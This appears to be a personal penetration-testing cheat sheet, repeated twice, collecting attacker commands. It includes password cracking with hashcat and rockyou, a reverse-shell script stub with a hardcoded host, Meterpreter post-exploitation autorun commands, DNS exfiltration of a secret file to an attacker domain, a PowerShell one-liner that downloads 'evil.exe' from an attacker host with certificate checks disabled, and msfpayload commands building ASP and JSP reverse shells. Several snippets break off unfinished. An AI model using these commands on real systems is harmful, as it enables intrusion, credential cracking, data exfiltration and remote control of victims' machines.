Ryan Bentz sckalath

## pub.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland

## pub.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland

## pub.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland

## password_cracking
#cracks md5(unix) hash, places found passwords in found.txt, removes them from the hasth list and uses the rockyou wordlist
hashcat -m 500 -a 0 -o found.txt --remove hashes.txt /usr/share/wordlist/rockyou.txt

## simple_py_shell
#!/usr/bin/python
# imports here
# Copyright 2012 TrustedSec, LLC. All rights reserved.
#
# This piece of software code is licensed under the FreeBSD license..
#
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.
import socket,subprocess
HOST = '192.168.12.45'    # The remote host
PORT = 443            # The same port as used by the server

## tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'

#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443

#base64 decode a string
echo STRINGTODECODE | base64 --decode

#escape jail shell

## metasploit_snippets
#autorun script (session.rc)
migrate -k -n explorer.exe
multi_console_command -cl "getsystem","getuid"
get_env
checkvm

#setting msf to use autorunscript above
set autorunscript multiscript.rb -rc /home/ryan/session.rc

## dns_egress_nix
On victim:
1. Hex encode the file to be transferred:
xxd -p secret file.hex
2. Read in each line and do a DNS lookup:
for b in 'cat file.hex'; do dig $b.shell.evilexample.com;done

On attacker:
1. Capture DNS exfil packets
tcpdump -w /tmp/dns -s0 port 53 and host system.example.com
2. Cut the exfilled hex from the DNS packet

## powershell_snippets
# Transfer file from attacking box to victim
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://attackerip/evil.exe"""; $destination="""C:\destination_file.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);"

## msfpayload_commands
# generate windows meterpreter on port 4444 that outputs an asp file
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.16.31 LPORT=4444 R | msfencode -o mwcb.asp -e generic/none -t asp

#generate jsp reverse tcp over port 443
msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.16.31 LPORT=443 R > jsprev.jsp

#would likely need to add this jsp to a WAR file for deployment
jar -cvf jsprev.war * #from within the main war directory that also contains the WEB-INF dir

#simple javascript reverse shell over port 443
	#cracks md5(unix) hash, places found passwords in found.txt, removes them from the hasth list and uses the rockyou wordlist
	hashcat -m 500 -a 0 -o found.txt --remove hashes.txt /usr/share/wordlist/rockyou.txt
	#!/usr/bin/python
	# imports here
	# Copyright 2012 TrustedSec, LLC. All rights reserved.
	#
	# This piece of software code is licensed under the FreeBSD license..
	#
	# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.
	import socket,subprocess
	HOST = '192.168.12.45' # The remote host
	PORT = 443 # The same port as used by the server
	#get a pty through python
	python -c 'import pty; pty.spawn("/bin/bash");'

	#grab the user agent from the http header on port 10443
	tcpdump -A -l -vvvs 1024 -npi eth0 port 10443

	#base64 decode a string
	echo STRINGTODECODE \| base64 --decode

	#escape jail shell
	#autorun script (session.rc)
	migrate -k -n explorer.exe
	multi_console_command -cl "getsystem","getuid"
	get_env
	checkvm

	#setting msf to use autorunscript above
	set autorunscript multiscript.rb -rc /home/ryan/session.rc
	On victim:
	1. Hex encode the file to be transferred:
	xxd -p secret file.hex
	2. Read in each line and do a DNS lookup:
	for b in 'cat file.hex'; do dig $b.shell.evilexample.com;done

	On attacker:
	1. Capture DNS exfil packets
	tcpdump -w /tmp/dns -s0 port 53 and host system.example.com
	2. Cut the exfilled hex from the DNS packet
	# Transfer file from attacking box to victim
	powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://attackerip/evil.exe"""; $destination="""C:\destination_file.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);"
	# generate windows meterpreter on port 4444 that outputs an asp file
	msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.16.31 LPORT=4444 R \| msfencode -o mwcb.asp -e generic/none -t asp

	#generate jsp reverse tcp over port 443
	msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.16.31 LPORT=443 R > jsprev.jsp

	#would likely need to add this jsp to a WAR file for deployment
	jar -cvf jsprev.war * #from within the main war directory that also contains the WEB-INF dir

	#simple javascript reverse shell over port 443